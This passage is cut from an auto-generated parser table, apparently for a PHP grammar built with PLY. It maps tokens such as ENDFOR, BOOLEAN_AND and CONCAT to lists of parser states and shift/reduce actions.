870,874,875,876,877,878,882,909,910,913,914,915,917,918,935,940,951,954,963,973,],[-50,-47,-23,-48,-38,-40,-42,-30,-22,-24,-25,-26,-39,-41,-43,-44,-45,-46,-56,-28,-443,-29,-443,-33,-70,-37,-443,-443,-49,-443,-53,-57,-60,-111,-27,-443,-62,827,-443,-89,827,-443,-51,-55,-110,-31,-64,-34,-85,827,827,-109,-65,
-71,-36,-83,-443,-92,-93,-86,-87,-61,-35,-76,-443,-91,-88,-54,-108,-32,-90,-63,-84,-77,-52,]),'ENDSWITCH':([10,29,121,130,164,166,168,285,286,287,288,289,345,346,347,348,352,355,361,449,500,570,613,620,621,630,632,634,636,637,638,639,657,703,740,741,756,757,758,759,762,776,811,813,820,825,830,841,862,867,869,870,874,875,876,877,878,882,909,910,913,914,915,917,918,935,940,951,954,963,973,],[-50,-47,-23,-48,-38,-40,-42,-30,-22,-24,-25,-26,-39,-41,-43,-44,-45,-46,-56,-28,-443,-29,-443,-33,-70,-37,-443,-49,-443,-53,-57,-60,-111,-27,-443,-62,-89,829,-443,-51,-55,-110,-31,-64,-34,-85,879,-109,-65,-71,-36,-83,-443,-92,-93,-86,-87,-61,-35,-76,-443,-91,-88,-54,-108,-32,-90,-63,-84,-77,-52,]),'ENDFOR':([10,29,121,130,164,166,168,285,286,287,288,289,345,346,347,348,352,355,361,449,500,570,613,620,621,630,634,636,637,638,639,657,703,740,741,759,762,776,811,813,820,825,841,862,867,869,870,877,878,882,909,910,911,915,917,918,935,938,951,954,963,973,],[-50,-47,-23,-48,-38,-40,-42,-30,-22,-24,-25,-26,-39,-41,-43,-44,-45,-46,-56,-28,-443,-29,-443,-33,-70,-37,-49,-443,-53,-57,-60,-111,-27,-443,-62,-51,-55,-110,-31,-64,-34,-85,-109,-65,-71,-36,-83,-86,-87,-61,-35,-76,-443,-88,-54,-108,-32,953,-63,-84,-77,-52,]),'OBJECT_OPERATOR':([12,17,35,39,43,44,67,73,74,75,77,78,79,80,82,83,84,85,88,89,90,91,92,93,94,95,96,97,100,101,104,106,107,109,111,116,117,165,167,169,178,181,187,203,204,206,207,208,209,212,213,214,216,223,224,225,226,227,228,234,235,236,237,238,239,240,241,242,243,247,248,249,250,252,253,259,269,271,273,278,279,283,299,300,301,302,303,305,306,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,337,342,343,344,374,376,377,378,379,380,381,382,383,384,385,386,388,390,392,402,414,415,416,417,418,419,422,426,427,428,430,431,433,434,437,439,440,445,450,478,480,481,482,483,484,486,494,497,511,524,525,527,529,530,531,536,538,539,544,546,547,548,549,552,553,558,561,562,563,564,565,618,619,623,625,673,674,675,676,677,685,686,695,
698,701,702,743,745,789,791,792,794,795,798,800,801,802,804,805,817,818,854,856,873,900,902,903,905,919,936,],[-362,131,-429,-180,-251,-430,-344,256,-350,-351,-354,-355,-356,-361,-342,-343,-207,-208,-367,-368,-369,-371,-372,-373,-374,-375,-376,-377,-225,-226,-228,-237,-239,131,-190,-429,-430,131,131,131,131,131,-370,-323,-324,-443,-185,-186,-187,394,-225,-228,-198,131,-315,-316,-317,-318,-321,-228,-322,-325,-326,-327,-328,-329,-330,-331,131,-338,-339,-340,-341,-347,-348,-363,-227,-228,-349,-364,-428,131,131,-443,-443,-244,-248,-250,131,-289,-290,-291,-292,-293,-294,-295,-296,-297,-298,-299,-300,-301,-302,-303,-304,-305,-306,-307,-308,-309,-310,-311,-312,-313,-314,131,131,131,131,131,-181,-278,-279,-280,-281,-282,-283,-284,-285,-286,-287,-288,-183,-197,-188,-253,131,131,-345,131,-443,-352,551,-365,-385,-229,-366,-230,-357,-358,-219,131,131,-209,131,-184,-221,-243,-245,131,-238,-320,131,131,-353,-182,-234,-229,-189,-443,-230,-252,131,131,-333,-336,-337,-346,-443,131,-361,131,131,-218,-235,-236,-240,-249,-319,131,131,-196,131,790,-194,131,797,-223,-210,-231,-232,-211,-220,131,-231,-193,-232,-199,131,-222,131,-212,-213,-214,-215,-246,-247,-195,-443,131,-224,-216,-217,131,-271,131,]),'BOOLEAN_AND':([12,17,35,39,43,44,67,73,74,75,77,78,79,80,82,83,84,85,88,89,90,91,92,93,94,95,96,97,100,101,104,106,107,109,111,116,117,165,167,169,178,181,187,203,204,206,207,208,209,212,213,214,216,223,224,225,226,227,228,234,235,236,237,238,239,240,241,242,243,247,248,249,250,252,253,259,269,271,273,278,279,283,299,300,301,302,303,305,306,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,337,342,343,344,374,376,377,378,379,380,381,382,383,384,385,386,388,390,392,402,414,415,416,417,418,419,426,427,428,430,431,433,434,437,439,440,445,450,452,453,454,458,459,461,462,463,464,467,478,480,481,482,483,484,486,494,497,511,524,525,527,529,530,531,536,538,539,544,546,547,548,549,552,553,558,561,562,563,564,565,595,596,597,598,600,606,607,61
8,619,623,625,673,674,675,676,677,685,686,695,698,701,702,704,705,706,707,708,709,710,711,712,713,714,715,716,717,718,719,720,721,722,723,724,725,726,727,728,729,730,732,736,737,738,743,745,789,791,792,794,795,798,800,801,802,804,805,807,808,809,810,817,818,854,856,873,900,902,903,904,905,919,926,936,945,],[-362,133,-429,-180,-251,-430,-344,-206,-350,-351,-354,-355,-356,-361,-342,-343,-207,-208,-367,-368,-369,-371,-372,-373,-374,-375,-376,-377,-225,-226,-228,-237,-239,133,-190,-429,-430,133,133,133,133,133,-370,-323,-324,-443,-185,-186,-187,-192,-225,-228,-198,133,-315,-316,-317,-318,-321,-228,-322,-325,-326,-327,-328,-329,-330,-331,133,133,133,133,133,133,-348,-363,-227,-228,-349,-364,-428,133,133,-443,-443,-244,-248,-250,133,-289,133,133,133,133,-294,-295,-296,-297,-298,-299,-300,-301,-302,-303,-304,-305,-306,-307,-308,-309,-310,-311,-312,-313,-314,133,133,133,133,133,133,133,133,133,133,133,133,133,133,133,133,133,-183,-197,-188,-253,133,133,-345,133,-443,-352,-365,-385,-229,-366,-230,-357,-358,-219,133,133,-209,133,-429,571,-402,-378,-379,-382,-383,-384,-389,-430,-184,-221,-243,-245,133,-238,133,133,133,-353,-182,-234,-229,-189,-443,-230,-252,133,133,-333,-336,-337,-346,-443,133,-361,133,133,-218,-235,-236,-240,-392,-393,571,-380,-390,571,-402,-249,133,133,133,-196,133,-191,-194,133,-205,-223,-210,-231,-232,-211,-403,571,571,571,571,-408,-409,-410,-411,-412,-413,-414,-415,-416,-417,-418,-419,-420,-421,-422,-423,-424,-425,-426,-427,-381,-391,-395,-365,-366,-386,-220,133,-231,-193,-232,133,133,-222,133,-212,-213,-214,-215,-394,571,-402,571,-246,-247,-195,-443,133,-224,-216,-217,571,133,-271,571,133,571,]),'BOOLEAN_OR':([12,17,35,39,43,44,67,73,74,75,77,78,79,80,82,83,84,85,88,89,90,91,92,93,94,95,96,97,100,101,104,106,107,109,111,116,117,165,167,169,178,181,187,203,204,206,207,208,209,212,213,214,216,223,224,225,226,227,228,234,235,236,237,238,239,240,241,242,243,247,248,249,250,252,253,259,269,271,273,278,279,283,299,300,301,302,303,305,306,309,310,311,312,313,31
4,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,337,342,343,344,374,376,377,378,379,380,381,382,383,384,385,386,388,390,392,402,414,415,416,417,418,419,426,427,428,430,431,433,434,437,439,440,445,450,452,453,454,458,459,461,462,463,464,467,478,480,481,482,483,484,486,494,497,511,524,525,527,529,530,531,536,538,539,544,546,547,548,549,552,553,558,561,562,563,564,565,595,596,597,598,600,606,607,618,619,623,625,673,674,675,676,677,685,686,695,698,701,702,704,705,706,707,708,709,710,711,712,713,714,715,716,717,718,719,720,721,722,723,724,725,726,727,728,729,730,732,736,737,738,743,745,789,791,792,794,795,798,800,801,802,804,805,807,808,809,810,817,818,854,856,873,900,902,903,904,905,919,926,936,945,],[-362,134,-429,-180,-251,-430,-344,-206,-350,-351,-354,-355,-356,-361,-342,-343,-207,-208,-367,-368,-369,-371,-372,-373,-374,-375,-376,-377,-225,-226,-228,-237,-239,134,-190,-429,-430,134,134,134,134,134,-370,-323,-324,-443,-185,-186,-187,-192,-225,-228,-198,134,-315,-316,-317,-318,-321,-228,-322,-325,-326,-327,-328,-329,-330,-331,134,134,134,134,134,134,-348,-363,-227,-228,-349,-364,-428,134,134,-443,-443,-244,-248,-250,134,-289,-290,134,134,134,-294,-295,-296,-297,-298,-299,-300,-301,-302,-303,-304,-305,-306,-307,-308,-309,-310,-311,-312,-313,-314,134,134,134,134,134,134,134,134,134,134,134,134,134,134,134,134,134,-183,-197,-188,-253,134,134,-345,134,-443,-352,-365,-385,-229,-366,-230,-357,-358,-219,134,134,-209,134,-429,572,-402,-378,-379,-382,-383,-384,-389,-430,-184,-221,-243,-245,134,-238,134,134,134,-353,-182,-234,-229,-189,-443,-230,-252,134,134,-333,-336,-337,-346,-443,134,-361,134,134,-218,-235,-236,-240,-392,-393,572,-380,-390,572,-402,-249,134,134,134,-196,134,-191,-194,134,-205,-223,-210,-231,-232,-211,-403,-404,572,572,572,-408,-409,-410,-411,-412,-413,-414,-415,-416,-417,-418,-419,-420,-421,-422,-423,-424,-425,-426,-427,-381,-391,-395,-365,-366,-386,-220,134,-231,-193,-232,134,134,-222,134,-212,-213,-214,-215,-394,572,-40
2,572,-246,-247,-195,-443,134,-224,-216,-217,572,134,-271,572,134,572,]),'LOGICAL_AND':([12,17,35,39,43,44,67,73,74,75,77,78,79,80,82,83,84,85,88,89,90,91,92,93,94,95,96,97,100,101,104,106,107,109,111,116,117,165,167,169,178,181,187,203,204,206,207,208,209,212,213,214,216,223,224,225,226,227,228,234,235,236,237,238,239,240,241,242,243,247,248,249,250,252,253,259,269,271,273,278,279,283,299,300,301,302,303,305,306,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,337,342,343,344,374,376,377,378,379,380,381,382,383,384,385,386,388,390,392,402,414,415,416,417,418,419,426,427,428,430,431,433,434,437,439,440,445,450,452,453,454,458,459,461,462,463,464,467,478,480,481,482,483,484,486,494,497,511,524,525,527,529,530,531,536,538,539,544,546,547,548,549,552,553,558,561,562,563,564,565,595,596,597,598,600,606,607,618,619,623,625,673,674,675,676,677,685,686,695,698,701,702,704,705,706,707,708,709,710,711,712,713,714,715,716,717,718,719,720,721,722,723,724,725,726,727,728,729,730,732,736,737,738,743,745,789,791,792,794,795,798,800,801,802,804,805,807,808,809,810,817,818,854,856,873,900,902,903,904,905,919,926,936,945,],[-362,135,-429,-180,-251,-430,-344,-206,-350,-351,-354,-355,-356,-361,-342,-343,-207,-208,-367,-368,-369,-371,-372,-373,-374,-375,-376,-377,-225,-226,-228,-237,-239,135,-190,-429,-430,135,135,135,135,135,-370,-323,-324,-443,-185,-186,-187,-192,-225,-228,-198,135,-315,-316,-317,-318,-321,-228,-322,-325,-326,-327,-328,-329,-330,-331,135,135,135,135,135,-347,-348,-363,-227,-228,-349,-364,-428,135,135,-443,-443,-244,-248,-250,135,-289,-290,-291,135,135,-294,-295,-296,-297,-298,-299,-300,-301,-302,-303,-304,-305,-306,-307,-308,-309,-310,-311,-312,-313,-314,135,135,135,135,135,-181,-278,-279,-280,-281,-282,-283,-284,-285,-286,-287,-288,-183,-197,-188,-253,135,135,-345,135,-443,-352,-365,-385,-229,-366,-230,-357,-358,-219,135,135,-209,135,-429,573,-402,-378,-379,-382,-383,-384,-389,-430,-184,-221,-243,-245,135,-2
38,-320,135,135,-353,-182,-234,-229,-189,-443,-230,-252,135,135,-333,-336,-337,-346,-443,135,-361,135,135,-218,-235,-236,-240,-392,-393,573,-380,-390,573,-402,-249,-319,135,135,-196,135,-191,-194,135,-205,-223,-210,-231,-232,-211,-403,-404,-405,573,573,-408,-409,-410,-411,-412,-413,-414,-415,-416,-417,-418,-419,-420,-421,-422,-423,-424,-425,-426,-427,-381,-391,-395,-365,-366,-386,-220,135,-231,-193,-232,-199,135,-222,135,-212,-213,-214,-215,-394,573,-402,573,-246,-247,-195,-443,135,-224,-216,-217,573,135,-271,573,135,573,]),'LOGICAL_OR':([12,17,35,39,43,44,67,73,74,75,77,78,79,80,82,83,84,85,88,89,90,91,92,93,94,95,96,97,100,101,104,106,107,109,111,116,117,165,167,169,178,181,187,203,204,206,207,208,209,212,213,214,216,223,224,225,226,227,228,234,235,236,237,238,239,240,241,242,243,247,248,249,250,252,253,259,269,271,273,278,279,283,299,300,301,302,303,305,306,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,337,342,343,344,374,376,377,378,379,380,381,382,383,384,385,386,388,390,392,402,414,415,416,417,418,419,426,427,428,430,431,433,434,437,439,440,445,450,452,453,454,458,459,461,462,463,464,467,478,480,481,482,483,484,486,494,497,511,524,525,527,529,530,531,536,538,539,544,546,547,548,549,552,553,558,561,562,563,564,565,595,596,597,598,600,606,607,618,619,623,625,673,674,675,676,677,685,686,695,698,701,702,704,705,706,707,708,709,710,711,712,713,714,715,716,717,718,719,720,721,722,723,724,725,726,727,728,729,730,732,736,737,738,743,745,789,791,792,794,795,798,800,801,802,804,805,807,808,809,810,817,818,854,856,873,900,902,903,904,905,919,926,936,945,],[-362,136,-429,-180,-251,-430,-344,-206,-350,-351,-354,-355,-356,-361,-342,-343,-207,-208,-367,-368,-369,-371,-372,-373,-374,-375,-376,-377,-225,-226,-228,-237,-239,136,-190,-429,-430,136,136,136,136,136,-370,-323,-324,-443,-185,-186,-187,-192,-225,-228,-198,136,-315,-316,-317,-318,-321,-228,-322,-325,-326,-327,-328,-329,-330,-331,136,136,136,136,136,-347,-34
8,-363,-227,-228,-349,-364,-428,136,136,-443,-443,-244,-248,-250,136,-289,-290,-291,-292,-293,-294,-295,-296,-297,-298,-299,-300,-301,-302,-303,-304,-305,-306,-307,-308,-309,-310,-311,-312,-313,-314,136,136,136,136,136,-181,-278,-279,-280,-281,-282,-283,-284,-285,-286,-287,-288,-183,-197,-188,-253,136,136,-345,136,-443,-352,-365,-385,-229,-366,-230,-357,-358,-219,136,136,-209,136,-429,574,-402,-378,-379,-382,-383,-384,-389,-430,-184,-221,-243,-245,136,-238,-320,136,136,-353,-182,-234,-229,-189,-443,-230,-252,136,136,-333,-336,-337,-346,-443,136,-361,136,136,-218,-235,-236,-240,-392,-393,574,-380,-390,574,-402,-249,-319,136,136,-196,136,-191,-194,136,-205,-223,-210,-231,-232,-211,-403,-404,-405,-406,-407,-408,-409,-410,-411,-412,-413,-414,-415,-416,-417,-418,-419,-420,-421,-422,-423,-424,-425,-426,-427,-381,-391,-395,-365,-366,-386,-220,136,-231,-193,-232,-199,136,-222,136,-212,-213,-214,-215,-394,574,-402,574,-246,-247,-195,-443,136,-224,-216,-217,574,136,-271,574,136,574,]),'LOGICAL_XOR':([12,17,35,39,43,44,67,73,74,75,77,78,79,80,82,83,84,85,88,89,90,91,92,93,94,95,96,97,100,101,104,106,107,109,111,116,117,165,167,169,178,181,187,203,204,206,207,208,209,212,213,214,216,223,224,225,226,227,228,234,235,236,237,238,239,240,241,242,243,247,248,249,250,252,253,259,269,271,273,278,279,283,299,300,301,302,303,305,306,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,337,342,343,344,374,376,377,378,379,380,381,382,383,384,385,386,388,390,392,402,414,415,416,417,418,419,426,427,428,430,431,433,434,437,439,440,445,450,452,453,454,458,459,461,462,463,464,467,478,480,481,482,483,484,486,494,497,511,524,525,527,529,530,531,536,538,539,544,546,547,548,549,552,553,558,561,562,563,564,565,595,596,597,598,600,606,607,618,619,623,625,673,674,675,676,677,685,686,695,698,701,702,704,705,706,707,708,709,710,711,712,713,714,715,716,717,718,719,720,721,722,723,724,725,726,727,728,729,730,732,736,737,738,743,745,789,791,792,794,79
5,798,800,801,802,804,805,807,808,809,810,817,818,854,856,873,900,902,903,904,905,919,926,936,945,],[-362,137,-429,-180,-251,-430,-344,-206,-350,-351,-354,-355,-356,-361,-342,-343,-207,-208,-367,-368,-369,-371,-372,-373,-374,-375,-376,-377,-225,-226,-228,-237,-239,137,-190,-429,-430,137,137,137,137,137,-370,-323,-324,-443,-185,-186,-187,-192,-225,-228,-198,137,-315,-316,-317,-318,-321,-228,-322,-325,-326,-327,-328,-329,-330,-331,137,137,137,137,137,-347,-348,-363,-227,-228,-349,-364,-428,137,137,-443,-443,-244,-248,-250,137,-289,-290,-291,137,-293,-294,-295,-296,-297,-298,-299,-300,-301,-302,-303,-304,-305,-306,-307,-308,-309,-310,-311,-312,-313,-314,137,137,137,137,137,-181,-278,-279,-280,-281,-282,-283,-284,-285,-286,-287,-288,-183,-197,-188,-253,137,137,-345,137,-443,-352,-365,-385,-229,-366,-230,-357,-358,-219,137,137,-209,137,-429,575,-402,-378,-379,-382,-383,-384,-389,-430,-184,-221,-243,-245,137,-238,-320,137,137,-353,-182,-234,-229,-189,-443,-230,-252,137,137,-333,-336,-337,-346,-443,137,-361,137,137,-218,-235,-236,-240,-392,-393,575,-380,-390,575,-402,-249,-319,137,137,-196,137,-191,-194,137,-205,-223,-210,-231,-232,-211,-403,-404,-405,575,-407,-408,-409,-410,-411,-412,-413,-414,-415,-416,-417,-418,-419,-420,-421,-422,-423,-424,-425,-426,-427,-381,-391,-395,-365,-366,-386,-220,137,-231,-193,-232,-199,137,-222,137,-212,-213,-214,-215,-394,575,-402,575,-246,-247,-195,-443,137,-224,-216,-217,575,137,-271,575,137,575,]),'AND':([12,17,34,35,39,43,44,45,67,73,74,75,77,78,79,80,82,83,84,85,88,89,90,91,92,93,94,95,96,97,100,101,104,106,107,109,110,111,116,117,119,165,167,169,178,181,187,191,203,204,206,207,208,209,212,213,214,216,218,223,224,225,226,227,228,234,235,236,237,238,239,240,241,242,243,247,248,249,250,252,253,259,265,269,271,273,278,279,283,299,300,301,302,303,305,306,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,337,342,343,344,365,374,376,377,378,379,380,381,382,383,384,385,386,388,389,390,3
92,402,404,407,414,415,416,417,418,419,425,426,427,428,430,431,433,434,437,439,440,444,445,446,450,452,453,454,458,459,461,462,463,464,467,478,479,480,481,482,483,484,486,491,494,497,504,509,511,524,525,527,529,530,531,536,538,539,544,546,547,548,549,552,553,556,557,558,559,560,561,562,563,564,565,595,596,597,598,600,606,607,618,619,623,625,645,673,674,675,676,677,682,685,686,695,698,701,702,704,705,706,707,708,709,710,711,712,713,714,715,716,717,718,719,720,721,722,723,724,725,726,727,728,729,730,732,736,737,738,743,745,751,784,789,791,792,794,795,798,800,801,802,803,804,805,806,807,808,809,810,817,818,837,842,854,856,873,900,902,903,904,905,919,921,926,927,936,944,945,],[-362,138,184,-429,-180,-251,-430,222,-344,-206,-350,-351,-354,-355,-356,-361,-342,-343,-207,-208,-367,-368,-369,-371,-372,-373,-374,-375,-376,-377,-225,-226,-228,-237,-239,138,184,-190,-429,-430,284,138,138,138,138,138,-370,375,-323,-324,-443,-185,-186,-187,-192,-225,-228,-198,222,138,-315,-316,-317,-318,-321,-228,-322,-325,-326,-327,-328,-329,-330,-331,138,138,138,138,138,138,-348,-363,284,-227,-228,-349,-364,-428,138,138,-443,-443,-244,-248,-250,138,138,138,138,138,138,-294,138,138,-297,-298,-299,-300,-301,-302,-303,-304,-305,-306,-307,-308,-309,-310,-311,-312,-313,-314,138,138,138,138,138,510,138,138,138,138,138,138,138,138,138,138,138,138,-183,284,-197,-188,-253,537,540,138,138,-345,138,-443,-352,284,-365,-385,-229,-366,-230,-357,-358,-219,138,138,284,-209,284,138,-429,576,-402,-378,-379,-382,-383,-384,-389,-430,-184,284,-221,-243,-245,138,-238,138,629,138,138,510,648,-353,-182,-234,-229,-189,-443,-230,-252,138,138,-333,-336,-337,-346,-443,138,-361,284,284,138,284,284,138,-218,-235,-236,-240,-392,-393,576,-380,-390,576,-402,-249,138,138,138,510,-196,138,-191,-194,138,796,-205,-223,-210,-231,-232,-211,576,576,576,576,576,-408,576,576,-411,-412,-413,-414,-415,-416,-417,-418,-419,-420,-421,-422,-423,-424,-425,-426,-427,-381,-391,-395,-365,-366,-386,-220,138,629,184,-231,-193,-232,138,138,-222,138
,-212,-213,284,-214,-215,284,-394,576,-402,576,-246,-247,886,184,-195,-443,138,-224,-216,-217,576,138,-271,942,576,510,138,510,576,]),'OR':([12,17,35,39,43,44,67,73,74,75,77,78,79,80,82,83,84,85,88,89,90,91,92,93,94,95,96,97,100,101,104,106,107,109,111,116,117,165,167,169,178,181,187,203,204,206,207,208,209,212,213,214,216,223,224,225,226,227,228,234,235,236,237,238,239,240,241,242,243,247,248,249,250,252,253,259,269,271,273,278,279,283,299,300,301,302,303,305,306,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,337,342,343,344,374,376,377,378,379,380,381,382,383,384,385,386,388,390,392,402,414,415,416,417,418,419,426,427,428,430,431,433,434,437,439,440,445,450,452,453,454,458,459,461,462,463,464,467,478,480,481,482,483,484,486,494,497,511,524,525,527,529,530,531,536,538,539,544,546,547,548,549,552,553,558,561,562,563,564,565,595,596,597,598,600,606,607,618,619,623,625,673,674,675,676,677,685,686,695,698,701,702,704,705,706,707,708,709,710,711,712,713,714,715,716,717,718,719,720,721,722,723,724,725,726,727,728,729,730,732,736,737,738,743,745,789,791,792,794,795,798,800,801,802,804,805,807,808,809,810,817,818,854,856,873,900,902,903,904,905,919,926,936,945,],[-362,139,-429,-180,-251,-430,-344,-206,-350,-351,-354,-355,-356,-361,-342,-343,-207,-208,-367,-368,-369,-371,-372,-373,-374,-375,-376,-377,-225,-226,-228,-237,-239,139,-190,-429,-430,139,139,139,139,139,-370,-323,-324,-443,-185,-186,-187,-192,-225,-228,-198,139,-315,-316,-317,-318,-321,-228,-322,-325,-326,-327,-328,-329,-330,-331,139,139,139,139,139,139,-348,-363,-227,-228,-349,-364,-428,139,139,-443,-443,-244,-248,-250,139,139,139,139,139,139,-294,-295,-296,-297,-298,-299,-300,-301,-302,-303,-304,-305,-306,-307,-308,-309,-310,-311,-312,-313,-314,139,139,139,139,139,139,139,139,139,139,139,139,139,139,139,139,139,-183,-197,-188,-253,139,139,-345,139,-443,-352,-365,-385,-229,-366,-230,-357,-358,-219,139,139,-209,139,-429,577,-402,-378,-379,-382,-383,-384,
-389,-430,-184,-221,-243,-245,139,-238,139,139,139,-353,-182,-234,-229,-189,-443,-230,-252,139,139,-333,-336,-337,-346,-443,139,-361,139,139,-218,-235,-236,-240,-392,-393,577,-380,-390,577,-402,-249,139,139,139,-196,139,-191,-194,139,-205,-223,-210,-231,-232,-211,577,577,577,577,577,-408,-409,-410,-411,-412,-413,-414,-415,-416,-417,-418,-419,-420,-421,-422,-423,-424,-425,-426,-427,-381,-391,-395,-365,-366,-386,-220,139,-231,-193,-232,139,139,-222,139,-212,-213,-214,-215,-394,577,-402,577,-246,-247,-195,-443,139,-224,-216,-217,577,139,-271,577,139,577,]),'XOR':([12,17,35,39,43,44,67,73,74,75,77,78,79,80,82,83,84,85,88,89,90,91,92,93,94,95,96,97,100,101,104,106,107,109,111,116,117,165,167,169,178,181,187,203,204,206,207,208,209,212,213,214,216,223,224,225,226,227,228,234,235,236,237,238,239,240,241,242,243,247,248,249,250,252,253,259,269,271,273,278,279,283,299,300,301,302,303,305,306,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,337,342,343,344,374,376,377,378,379,380,381,382,383,384,385,386,388,390,392,402,414,415,416,417,418,419,426,427,428,430,431,433,434,437,439,440,445,450,452,453,454,458,459,461,462,463,464,467,478,480,481,482,483,484,486,494,497,511,524,525,527,529,530,531,536,538,539,544,546,547,548,549,552,553,558,561,562,563,564,565,595,596,597,598,600,606,607,618,619,623,625,673,674,675,676,677,685,686,695,698,701,702,704,705,706,707,708,709,710,711,712,713,714,715,716,717,718,719,720,721,722,723,724,725,726,727,728,729,730,732,736,737,738,743,745,789,791,792,794,795,798,800,801,802,804,805,807,808,809,810,817,818,854,856,873,900,902,903,904,905,919,926,936,945,],[-362,140,-429,-180,-251,-430,-344,-206,-350,-351,-354,-355,-356,-361,-342,-343,-207,-208,-367,-368,-369,-371,-372,-373,-374,-375,-376,-377,-225,-226,-228,-237,-239,140,-190,-429,-430,140,140,140,140,140,-370,-323,-324,-443,-185,-186,-187,-192,-225,-228,-198,140,-315,-316,-317,-318,-321,-228,-322,-325,-326,-327,-328,-329,-330,-331,140,1
40,140,140,140,140,-348,-363,-227,-228,-349,-364,-428,140,140,-443,-443,-244,-248,-250,140,140,140,140,140,140,-294,140,-296,-297,-298,-299,-300,-301,-302,-303,-304,-305,-306,-307,-308,-309,-310,-311,-312,-313,-314,140,140,140,140,140,140,140,140,140,140,140,140,140,140,140,140,140,-183,-197,-188,-253,140,140,-345,140,-443,-352,-365,-385,-229,-366,-230,-357,-358,-219,140,140,-209,140,-429,578,-402,-378,-379,-382,-383,-384,-389,-430,-184,-221,-243,-245,140,-238,140,140,140,-353,-182,-234,-229,-189,-443,-230,-252,140,140,-333,-336,-337,-346,-443,140,-361,140,140,-218,-235,-236,-240,-392,-393,578,-380,-390,578,-402,-249,140,140,140,-196,140,-191,-194,140,-205,-223,-210,-231,-232,-211,578,578,578,578,578,-408,578,-410,-411,-412,-413,-414,-415,-416,-417,-418,-419,-420,-421,-422,-423,-424,-425,-426,-427,-381,-391,-395,-365,-366,-386,-220,140,-231,-193,-232,140,140,-222,140,-212,-213,-214,-215,-394,578,-402,578,-246,-247,-195,-443,140,-224,-216,-217,578,140,-271,578,140,578,]),'CONCAT':([12,17,35,39,43,44,67,73,74,75,77,78,79,80,82,83,84,85,88,89,90,91,92,93,94,95,96,97,100,101,104,106,107,109,111,116,117,165,167,169,178,181,187,203,204,206,207,208,209,212,213,214,216,223,224,225,226,227,228,234,235,236,237,238,239,240,241,242,243,247,248,249,250,252,253,259,269,271,273,278,279,283,299,300,301,302,303,305,306,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,337,342,343,344,374,376,377,378,379,380,381,382,383,384,385,386,388,390,392,402,414,415,416,417,418,419,426,427,428,430,431,433,434,437,439,440,445,450,452,453,454,458,459,461,462,463,464,467,478,480,481,482,483,484,486,494,497,511,524,525,527,529,530,531,536,538,539,544,546,547,548,549,552,553,558,561,562,563,564,565,595,596,597,598,600,606,607,618,619,623,625,673,674,675,676,677,685,686,695,698,701,702,704,705,706,707,708,709,710,711,712,713,714,715,716,717,718,719,720,721,722,723,724,725,726,727,728,729,730,732,736,737,738,743,745,789,791,792,794,795,798,800,
801,802,804,805,807,808,809,810,817,818,854,856,873,900,902,903,904,905,919,926,936,945,],[-362,141,-429,-180,-251,-430,-344,-206,-350,-351,-354,-355,-356,-361,-342,-343,-207,-208,-367,-368,-369,-371,-372,-373,-374,-375,-376,-377,-225,-226,-228,-237,-239,141,-190,-429,-430,141,141,141,141,141,-370,-323,-324,-443,-185,-186,-187,-192,-225,-228,-198,141,-315,-316,-317,-318,-321,-228,-322,-325,-326,-327,-328,-329,-330,-331,141,141,141,141,141,141,-348,-363,-227,-228,-349,-364,-428,141,141,-443,-443,-244,-248,-250,141,141,141,141,141,141,141,141,141,-297,-298,-299,-300,-301,141,141,-304,141,141,141,141,141,141,141,141,-313,-314,141,141,141,141,141,141,141,141,141,141,141,141,141,141,141,141,141,-183,-197,-188,-253,141,141,-345,141,-443,-352,-365,-385,-229,-366,-230,-357,-358,-219,141,141,-209,141,-429,579,-402,-378,-379,-382,-383,-384,-389,-430,-184,-221,-243,-245,141,-238,141,141,141,-353,141,-234,-229,-189,-443,-230,-252,141,141,-333,-336,-337,-346,-443,141,-361,141,141,-218,-235,-236,-240,-392,-393,579,-380,-390,579,-402,-249,141,141,141,-196,141,-191,-194,141,-205,-223,-210,-231,-232,-211,579,579,579,579,579,579,579,579,-411,-412,-413,-414,-415,579,579,-418,579,579,579,579,579,579,579,579,-427,-381,-391,-395,-365,-366,-386,-220,141,-231,-193,-232,141,141,-222,141,-212,-213,-214,-215,-394,579,-402,579,-246,-247,-195,-443,141,-224,-216,-217,579,141,-271,579,141,579,]),'MUL':([12,17,35,39,43,44,67,73,74,75,77,78,79,80,82,83,84,85,88,89,90,91,92,93,94,95,96,97,100,101,104,106,107,109,111,116,117,165,167,169,178,181,187,203,204,206,207,208,209,212,213,214,216,223,224,225,226,227,228,234,235,236,237,238,239,240,241,242,243,247,248,249,250,252,253,259,269,271,273,278,279,283,299,300,301,302,303,305,306,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,337,342,343,344,374,376,377,378,379,380,381,382,383,384,385,386,388,390,392,402,414,415,416,417,418,419,426,427,428,430,431,433,434,437,439,440,445,450,452,453,454,458,
